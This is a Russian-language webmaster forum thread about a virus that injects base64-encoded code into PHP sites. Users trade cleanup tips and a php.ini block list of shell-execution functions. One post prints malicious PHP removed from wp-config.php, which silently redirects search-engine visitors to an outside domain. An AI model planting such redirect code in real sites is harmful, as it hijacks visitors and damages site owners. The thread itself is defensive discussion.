Вирус base64_decode во всех PHP скриптах

123
Garin33
На сайте с 31.08.2009
Offline
169
#11

Stolz, примерчик того, какие функции блокируете в php.ini не выложите?:)

Потому что Drupal - это круто.
facegrodno
На сайте с 02.05.2009
Offline
45
#12

с аналогичными признаками в начале месяца этого были взломаны сайты на WP. Вирусняк вначале создавал файлы вида w1234567w.php в корне сайтов, затем прописывал по всем *.php свой код в начале, как писал ТС. Следующим шагом была подмена .htaccess с редиректом и на все папки 777. Спасибо хостерам - все почистили.

поэтому, проследите дальше, не будет ли подмена файлов.

поставил плагин, который отслеживает активность на сайте и вижу, что ежедневно идет атака с кодом eval(base64.....) с IP 31.*.*.* (разный дальше)

Партнерка кино и развлекательное (http://u.to/BrgYAQ) Новая Кинопартнерка (http://goo.gl/tXuaC) NEW Май 2012
Garin33
На сайте с 31.08.2009
Offline
169
#13

facegrodno, а как плагин называется?

facegrodno
На сайте с 02.05.2009
Offline
45
#14

mute screamer

BS
На сайте с 13.01.2012
Offline
0
#15
arber:
Да говоря по правде у меня четыре jooml'ы полетели 1.5.25 в том числе, при чем на 3ех разных хост площадках. 2 из которых практически новых сайта! и кроме меня о них ни кто не знал.



А вот с этим уже интересно, как думаете может к хостингу обратится?

P.S. Огромное спасибо за помощь! Уже трижды поверил комп на вирусы, сейчас буду привдить сайты в порядок :)

Не просто обьратиться, а бить в живот ногами. Это чистейший прощелк админов. Так как на большинстве хостнгов обновляют софт только тогда, когда уже просто их сервера сносят хакеры после установки через незакрытые дыры или когда клиенты криком кричат из-за неподдерживаемых НУЖНЫХ им функций в старом софте. В целом многие хостинги работают по принципу "заплатил - свободен". Потеряв 7 серверов, после "внезапного пожара" в ХостингЮА (Одесса) я принял категорическое решение. Все что приносит деньги выносить за пределы СНГ. И ни разу не пожалел. А Вы уж многоуважаемые принимайте решение сами , что Вам делать.

A
На сайте с 04.11.2010
Offline
23
#16

Так сайты почистил - удалил этот код и вуаля больше ни каких проблем, очень помогла программа @Text Replacer - очистила весь код за 1-2 минуты. Установил права не изменять файлы - и вроде все нормально. Поисковики больше не жалуются.

Подозрений какой плагин, модуль или компонент мог это сделать у меня нет. Насчет паролей - вобще ни где не храню - помню наизусть.

http://zvukvetra.ru (http://zvukvetra.ru) - Творческое объединение города Тольятти http://krivov.net (http://krivov.net) - Студия дизайна и рекламы Тольятти
Stolz
На сайте с 25.01.2007
Offline
181
#17
Garin33:
Stolz, примерчик того, какие функции блокируете в php.ini не выложите?:)

disable_functions="popen, exec, system, passthru, proc_open, shell_exec, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, base64_decode, disk_free_space, diskfreespace, dl, highlight_file, ini_alter, ini_restore, openlog, passthru, phpinfo, proc_nice, shell_exec, show_source, symlink, define_syslog_variables, escapeshellarg, escapeshellcmd,ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file,posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname"

В завимости от сайтов и задач этот список может варьироваться. Когда настраиваете VDS или сервер просто вбиваете все по максимуму, а затем наблюдать - при включенном выводе ошибок система сообщит, что та или иная функция запрещена.

CoolZar
На сайте с 04.01.2006
Offline
141
#18

Сам сегодня пострадал от сабжа:

вот такой код выполнялся

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://happynewyear.osa.pl/");
exit();
}
}
}
}

Вырезал заразу из файла wp-config.php. У кого-то есть данные, каким способом заливалось, или гадать только на кофейной гуще пока можно?

С уважением, Павел Консультирую по инфобизнесу (/ru/forum/745099) Как получать 50-100 заказов ежедневно из тизерных сетей? (http://goo.gl/EjCb3X)
A
На сайте с 04.11.2010
Offline
23
#19
CoolZar:
Сам сегодня пострадал от сабжа:
вот такой код выполнялся


Вырезал заразу из файла wp-config.php. У кого-то есть данные, каким способом заливалось, или гадать только на кофейной гуще пока можно?

Ну чисто гипотетически, есть такое предположение: какой-то "добрый seoшник" и в любом случаи талантливый человек написал скрипт, который при активации открывает все текстовые файлы, находит строку "<?php " и меняет ее на нужный ему текст. А заливался этот скрипт, возможно, самостоятельно, допустим автор скрипта втащил его в какой-нибудь популярный плагин или модуль, дописал строчку активации скрипта и выложил в интернет. И при установки вуаля все новые сайты будут ссылаться на него. Профилактика: права 555 на все файлы.

и я заметил такую особенность после удаления строк с вредным кодом, даже если права 777, на следующий день код не появляется, возможно данный скрипт запускается один раз.

CoolZar
На сайте с 04.01.2006
Offline
141
#20

Работоспособность того же вордпресса например не обвалится от такого?

arber:
Профилактика: права 555 на все файлы.
123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий